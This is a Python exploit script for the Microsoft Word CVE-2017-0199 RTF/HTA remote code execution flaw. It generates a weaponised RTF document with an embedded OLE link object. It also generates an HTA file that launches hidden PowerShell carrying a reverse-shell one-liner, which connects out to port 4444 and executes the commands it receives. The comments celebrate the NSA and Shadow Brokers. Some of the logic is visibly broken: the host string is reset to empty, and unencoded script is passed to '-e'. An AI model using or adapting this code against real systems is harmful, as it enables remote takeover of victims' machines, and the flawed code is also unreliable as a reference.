Microsoft Word (CVE-2017-0199) RCE through a HTA Handler, by Juan Sacco / <[email protected]>

word2017-0199.py

# Exploit Author: Juan Sacco at KPN Red Team
# Developed using Exploit Pack -  http://www.exploitpack.com  <[email protected]>
#
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough a HTA Handler 
# A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. 
# An attacker who successfully exploited this vulnerability could take control of an affected system.
#
# Impact: An attacker could exploit this vulnerability to execute arbitrary commands in the
# context of the application. Failed exploit attempts could result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.microsoft.com
# 
# Credits: @ShadowBrokerss @EquationGroup @Petya @juansacco

import binascii
def chunk_str(str, chunk_size):
 return [str[i:i+chunk_size] for i in range(0, len(str), chunk_size)]
hta_host="" # 127.0.0.1
for i in chunk_str(binascii.hexlify(b'http://127.0.0.1'),2):
    hta_host+= str(i+"00")
hta_host="" # 127.0.0.1
hta_object = "01000002090000000100000000000000"
hta_object += "0000000000000000a4000000e0c9ea79"
hta_object += "f9bace118c8200aa004ba90b8c000000"
hta_object += hta_host
hta_object += "00000000795881f43b1d7f48af2c825d"
hta_object += "c485276300000000a5ab0000ffffffff"
hta_object += "0609020000000000c000000000000046"
hta_object += "00000000ffffffff0000000000000000"
hta_object += "906660a637b5d2010000000000000000"
hta_object += "00000000000000000000000000000000"
hta_object += "100203000d0000000000000000000000"
hta_object += "0"*480
rtf_template = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\r\n{\\info\r\n{\\author Microsoft}\r\n{\\operator Microsoft}\r\n}\r\n{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\r\n{\r\n{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\r\n{\\*\\objclass Word.Document.8}\r\n{\\*\\objdata 0105000002000000\r\n090000004f4c45324c696e6b000000000000000000000a0000\r\nd0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nfffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\r\n6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\r\n0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\r\n00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\n"
rtf_template += hta_object
rtf_template += "0105000000000000}\r\n{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\r\n{\\*\\datastore }\r\n}\r\n"
print("[*] Microsoft Word RCE - HTA Handler by Juan Sacco")
file_rtf = open("exploitpack.rtf","w") 
file_rtf.write(rtf_template) 
file_rtf.close() 
print("[*] RTF File created")
print rtf_template
# Extra bonus PS Reverse one-liner
ps_reverse_shell = "$sm=(New-Object Net.Sockets.TCPClient(\"192.168.1.1\",4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}\r\n" # Reverse to 192.168.1.1 4444
hta_template = "<script language=\"VBScript\">\r\nSet pwnShell = CreateObject(\"Wscript.Shell\") \r\nSet fsObject = CreateObject(\"Scripting.FileSystemObject\")\r\nIf fsObject.FileExists(pwnShell.ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then\r\n    pwnShell.Run \"powershell.exe -nop -w hidden -e " 
hta_template += ps_reverse_shell
hta_template += "\",0\r\nEnd If\r\nwindow.close()\r\n</script>\r\n"
file_hta = open("exploitpack.hta","w")
file_hta.write(hta_template)
file_hta.close()
print("[*] HTA File created")
print hta_template
print("[*] Thanks NSA!")
print("[*] Creditz: @EquationGroup @ShadowBrokers @juansacco")
print("[*] KPN Red team: <[email protected]>")